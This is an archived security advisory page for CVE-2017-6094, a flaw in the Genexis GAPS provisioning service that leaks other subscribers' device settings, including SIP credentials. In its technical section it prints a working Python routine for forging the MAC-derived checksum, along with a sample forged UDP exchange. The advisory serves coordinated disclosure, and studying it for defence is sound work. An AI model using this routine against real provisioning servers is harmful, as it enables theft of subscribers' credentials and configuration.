what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Genexis GAPS 7.2 Access Control

Genexis GAPS 7.2 Access Control
Posted Dec 20, 2017
Authored by Antoine Neuenschwander

Genexis GAPS versions up to 7.2 suffers from an access control vulnerability that discloses sensitive data.

tags | exploit, info disclosure
advisories | CVE-2017-6094
SHA-256 | 655a32ed49ee22745ac8ca02bd5c3c53a21a5bfbaacf074229b041503865e94a

Genexis GAPS 7.2 Access Control

Change Mirror Download
################################################################################
# #
# CVE-2017-6094 - Genexis GAPS Access Control Vulnerability #
# #
################################################################################
# #
# Product: Genexis Automatic Provisioning System (GAPS) #
# Vendor: Genexis B.V. #
# CVE ID: CVE-2017-6094 #
# Subject: Access control vulnerability #
# Effect: Leaked configuration settings, including user credentials #
# Author: Antoine Neuenschwander <antoine@schoggi.org> #
# Date: 2017-12-18 #
# #
################################################################################


Vendor/product description:
-----------------------------
Genexis develops FTTH equipment for the optical distribution networks of ISPs
including customer premises equipment (CPE) as well as infrastructure
components, supporting triple-play services (broadband internet, IPTV and VoIP).
The Genexis Automatic Provisioning System (GAPS) is the service used to monitor,
configure and update the CPEs.
URL: https://genexis.eu/product/gaps/

Introduction:
-------------
Management of Genexis CPEs can be done using TR-069 or DHCP/TFTP in combination
with UDP-based CPE commands. The CPE checks for most recent settings at startup
and performs periodic update checks. GAPS provides the configuration settings
for individual CPEs based on the device's MAC address. A configuration record
includes the following settings (among other):
- tftp server address, used to retrieve firmware images
- ingress and egress bitrates, according to the user's subscription
- sip server address, used to register to a VoIP service
- sip client credentials, used to authenticate the VoIP client
- ...
Given the MAC address, it was found possible to retrieve the configuration
settings of other subscribers' CPEs by sending forged UDP packets to GAPS. As a
result, sensitive data such as the sip credentials are exposed.

Affected:
---------
This issue affects all versions up to 7.2. First mitigations available after
version 6.1.

Technical Description:
----------------------
A CPE identifies itself by the MAC address of its WAN interface and a certain
"chk" value (48bit) derived from the MAC. The algorithm used to compute the
"chk" was disclosed by reverse engineering the CPE's firmware (retrieved from
the tftp server). It is possible to forge valid "chk" values for any given MAC
address using the following python routine:

def chk(mac):
a = [int(x, 16) for x in mac.split(':', 6)]
chk = [0] * 6

chk[5] = 1*a[0] + 3*a[1] + 7*a[2] + 115 & 0xff
chk[3] = 7*a[1] + 1*a[2] + 3*a[3] + 101 & 0xff
chk[0] = 3*a[2] + 7*a[3] + 1*a[4] + 99 & 0xff
chk[4] = 1*a[3] + 3*a[4] + 7*a[5] + 114 & 0xff
chk[1] = 3*a[0] + 7*a[4] + 1*a[5] + 101 & 0xff
chk[2] = 7*a[0] + 1*a[1] + 3*a[5] + 116 & 0xff

return ':'.join(['{:02x}'.format(x) for x in chk])

Example UDP message exchange (CPE <-> GAPS):
--------------------------------------------

> mac=000f9461cafe
> chk=90e97d8523ac
> type=OCG1018MX
> hw=0
> fw=OCG1018MX.v1.10.0.10c.bin
> stage=0

< vlan_mmt=62241
< vlan_voice=58146
< vlan_p1=33572
< defpri=0000000000000000
< vlansp1=8324
< prip1=00
< userid0=<phonenr>
< authid0=<userid>
< passwd0=<password>
< clip0=1
< clir0=0
< callwait0=0
< conference0=0
< clip1=0
< clir1=0
< callwait1=0
< conference1=0
< tftp_server=10.21.0.7
< tftp_server_port=69
< storecfg=0
< sip_server=<sip provider ip>
< sip_server_port=5060
< ratecount=3
< reg_exp=4
< country=ch
< send_dtmf=1
< sendflash=0
< dialplan=4|0[2-7]1[^]8|0[89]1[^]8|18[0-9]2|16[0-9]1|[^]+
< cliptype=1
< erate_p1=300
< versionOCG1018MX=OCG1018MX.v1.10.0.10c.bin
< erate_wan=300
< irate=012c0000000000000000000000000000
< erate=012c0000000000000000000000000000

Workaround / Fix:
-----------------
As of GAPS 6.2, GAPS provides a workaround to limit CPE requests. To further
improve security, it is advised to use MACless provisioning with random postfix
to harden the workaround.
Starting with GAPS 7.3, the GAPS protocol will support a mechanism to prevent
calculated checksums to be be valid.

Timeline:
---------
2017-01-13: Found vulnerability
2017-01-16: Contacted ISP
2017-01-17: ISP confirms vulnerability and contacts vendor
2017-01-18: Vendor confirms vulnerability
2017-02-13: CVE-ID requested
2017-02-19: CVE-ID assigned
2017-05-19: Vendor agrees on disclosure date: 2017-07-03
2017-06-23: Vendor postpones disclosure date: 2017-09-01
2017-07-31: Vendor postpones disclosure date: 2017-12-18
2017-12-18: Coordinated disclosure


Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close